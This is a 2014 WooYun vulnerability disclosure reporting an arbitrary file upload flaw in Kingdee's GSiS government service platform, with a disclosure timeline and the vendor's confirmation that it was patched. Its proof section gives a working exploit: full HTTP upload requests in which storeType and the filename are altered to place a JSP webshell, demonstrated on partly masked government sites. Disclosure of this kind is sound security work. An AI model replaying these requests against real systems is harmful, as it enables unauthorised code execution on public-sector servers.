当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-069300

漏洞标题:金蝶政务GSiS服务平台通用上传漏洞

相关厂商:金蝶

漏洞作者: 路人甲

提交时间:2014-07-22 19:57

修复时间:2014-10-20 19:58

公开时间:2014-10-20 19:58

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-22: 细节已通知厂商并且等待厂商处理中
2014-07-23: 厂商已经确认,细节仅向厂商公开
2014-07-26: 细节向第三方安全合作伙伴开放
2014-09-16: 细节向核心白帽子及相关领域专家公开
2014-09-26: 细节向普通白帽子公开
2014-10-06: 细节向实习白帽子公开
2014-10-20: 细节向公众公开

简要描述:

GSiS政务服务平台:首个完全根据国家政策要求全新开发的,支撑政务服务体系和行政权力监督体系融合运转的一体化平台。
测试中发现存在任意文件上传漏洞,可获取webshell

详细说明:

问题:上传页面多数参数可控,导致任意文件上传,且有越权访问会员外功能问题。
收集到的案例有:
高平市政务中心
http://gk.sx******.gov.cn:8080/kdgs/
汉川政务中心
http://www.han****.gov.cn:8080/kdgs
等等
通杀所有金蝶GSIS

漏洞证明:

本次演示地址为:
http://gk.sx******.gov.cn:8080/kdgs
漏洞地址:http://gk.sx******.gov.cn:8080/kdgs/portal/share/upload/uploadFile.jsp
第一步:
注册并登录网站会员获取合法会话标识
注册地址
http://gk.sx******.gov.cn:8080/kdgs/biz/portal/user/regist.action?registUserType=
如果页面找不到注册按钮的可以直接替换页面找到注册地址。
第二步:
访问文件上传页面,利用burpsuite代理进行上传
正常上传POST请求为

POST /kdgs/biz/portal/upload/upload.action HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://gk.sx******.gov.cn:8080/kdgs/portal/share/upload/uploadFile.jsp?path=ITEM_PATH&maximumSize=3145728&fileSaveMode=00&storeType=db&refreshTimestamp=1405994496640
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Content-Type: multipart/form-data; boundary=---------------------------7def0302c2
Accept-Encoding: gzip, deflate
Host: gk.sx******.gov.cn:8080
Content-Length: 1502
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=B247935EBA2FB9FE9B4C4506A4646D45; __userType__cookie=INNER
-----------------------------7def0302c2
Content-Disposition: form-data; name="id"
-----------------------------7def0302c2
Content-Disposition: form-data; name="viewid"
-----------------------------7def0302c2
Content-Disposition: form-data; name="path"
ITEM_PATH
-----------------------------7def0302c2
Content-Disposition: form-data; name="fileSaveMode"
00
-----------------------------7def0302c2
Content-Disposition: form-data; name="uploadList_"
-----------------------------7def0302c2
Content-Disposition: form-data; name="fieldValue"
-----------------------------7def0302c2
Content-Disposition: form-data; name="allowedTypes"
-----------------------------7def0302c2
Content-Disposition: form-data; name="maximumSize"
3145728
-----------------------------7def0302c2
Content-Disposition: form-data; name="storeType"
db
-----------------------------7def0302c2
Content-Disposition: form-data; name="fieldid"
-----------------------------7def0302c2
Content-Disposition: form-data; name="file"; filename="3.gif"
Content-Type: image/gif
wooyun
-----------------------------7def0302c2
Content-Disposition: form-data; name="filename"
C:\fakepath\3.gif
-----------------------------7def0302c2
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream
-----------------------------7def0302c2
Content-Disposition: form-data; name="filename"
-----------------------------7def0302c2--


修改storeType的值db为folder
修改filename的值为XX.jsp

2.png


修改后的POST数据包为

POST /kdgs/biz/portal/upload/upload.action HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://gk.sx******.gov.cn:8080/kdgs/portal/share/upload/uploadFile.jsp?path=ITEM_PATH&maximumSize=3145728&fileSaveMode=00&storeType=db&refreshTimestamp=1405994496640
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Content-Type: multipart/form-data; boundary=---------------------------7def0302c2
Accept-Encoding: gzip, deflate
Host: gk.sx******.gov.cn:8080
Content-Length: 1502
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=B247935EBA2FB9FE9B4C4506A4646D45; __userType__cookie=INNER
-----------------------------7def0302c2
Content-Disposition: form-data; name="id"
-----------------------------7def0302c2
Content-Disposition: form-data; name="viewid"
-----------------------------7def0302c2
Content-Disposition: form-data; name="path"
ITEM_PATH
-----------------------------7def0302c2
Content-Disposition: form-data; name="fileSaveMode"
00
-----------------------------7def0302c2
Content-Disposition: form-data; name="uploadList_"
-----------------------------7def0302c2
Content-Disposition: form-data; name="fieldValue"
-----------------------------7def0302c2
Content-Disposition: form-data; name="allowedTypes"
-----------------------------7def0302c2
Content-Disposition: form-data; name="maximumSize"
3145728
-----------------------------7def0302c2
Content-Disposition: form-data; name="storeType"
folder
-----------------------------7def0302c2
Content-Disposition: form-data; name="fieldid"
-----------------------------7def0302c2
Content-Disposition: form-data; name="file"; filename="3.gif"
Content-Type: image/gif
wooyun
-----------------------------7def0302c2
Content-Disposition: form-data; name="filename"
C:\fakepath\3.jsp
-----------------------------7def0302c2
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream
-----------------------------7def0302c2
Content-Disposition: form-data; name="filename"
-----------------------------7def0302c2--


上传成功后得到

2214090909734adf55858a24ca2745e921f09f4c.png


webshell地址为
http://gk.sx******.gov.cn:8080/kdgs/uploads/item/11e4-1165-d78d7b5a-ba69-331a1d69f888.jsp
11e4-1165-d78d7b5a-ba69-331a1d69f888.jsp是随机的,看burpsuite回显。

22141009dd5c045a79425a4decd5bb2b0eeedd89.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-07-23 13:42

厂商回复:

谢谢你对金蝶关注,深入研究金蝶产品发现安全漏洞,我们产品部门已制作补丁并通知客户安装修复。

最新状态:

暂无